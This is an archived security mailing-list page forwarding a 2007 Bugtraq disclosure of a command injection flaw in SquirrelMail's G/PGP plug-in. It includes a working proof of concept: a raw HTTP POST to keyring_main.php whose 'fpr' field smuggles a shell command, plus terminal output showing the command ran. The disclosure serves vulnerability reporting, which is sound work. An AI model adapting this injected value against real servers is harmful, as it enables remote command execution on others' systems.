Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] Fwd: SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability




--This is a forwarded message
From: does_not_exist@xxxxxxxxxxxxxxxxxxxxx 
<does_not_exist@xxxxxxxxxxxxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx <bugtraq@xxxxxxxxxxxxxxxxx>
Date: Wednesday, July 11, 2007, 6:10:30 PM
Subject: SquirrelMail G/PGP Encryption Plug-in Remote Command Execution 
Vulnerability

===8<==============Original message text===============
SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability

Bugtraq ID: 24782

-----------------------------

There are various vulnerabilities in this software! One is in keyring_main.php!
$fpr is not escaped from shellcommands!

testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#

***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | 
&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1

...

testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#

So we just executed 'touch /tmp/w00t'!

WabiSabiLabi tries to sell the exploit for 700 Euro! ;)
lol @ WabiSabiLabi!

Greets:

oli and all members of jmp-esp!


jmp-esp is looking for people who are interested in IT security!
Currently we are looking for people who like to write articles for a German 
ezine or are interested in exchanging informations, exploits...

IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl)
     #main
===8<===========End of original message text===========


-- 
~/ZARAZA
http://securityvulns.ru/



 




Copyright © Lexa Software, 1996-2009.